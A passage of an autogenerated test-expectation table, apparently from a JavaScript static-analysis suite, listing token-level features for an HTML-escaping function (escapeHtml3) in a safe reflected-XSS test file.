contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:7 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:7 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:7 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:7 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:7 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i = 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i = 0 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i = 0 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i = 0 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:7:69:11 | i = 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:11:69:11 | 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:11:69:11 | 0 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:11:69:11 | 0 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:11:69:11 | 0 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:69:11:69:11 | 0 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:70:14 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:70:14 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:70:14 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:70:14 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:70:14 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChar ... ">"\\n } | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChar ... ">"\\n } | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChar ... ">"\\n } | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChar ... ">"\\n } | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChar ... ">"\\n } | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChars | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:7:75:3 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:18:75:3 | {\\n A ... ">"\\n } | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:18:75:3 | {\\n A ... ">"\\n } | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:18:75:3 | {\\n A ... ">"\\n } | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:18:75:3 | {\\n A ... ">"\\n } | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:70:18:75:3 | {\\n A ... ">"\\n } | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:7 | AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:7 | AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:7 | AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:7 | AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:7 | AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:5:71:11 | AMP: 38 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | assignedToPropName | AMP | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:71:10:71:11 | 38 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:8 | QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:8 | QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:8 | QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:8 | QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:8 | QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:5:72:12 | QUOT: 34 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | assignedToPropName | QUOT | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:72:11:72:12 | 34 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:6 | LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:6 | LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:6 | LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:6 | LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:6 | LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:5:73:10 | LT: 60 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | assignedToPropName | LT | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:73:9:73:10 | 60 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:6 | GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:6 | GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:6 | GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:6 | GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:6 | GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:5:74:10 | GT: 62 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | assignedToPropName | GT | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:74:9:74:10 | 62 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:11 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:11 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:11 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:11 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:11 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts = ... (0, i)] | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts = ... (0, i)] | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts = ... (0, i)] | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| 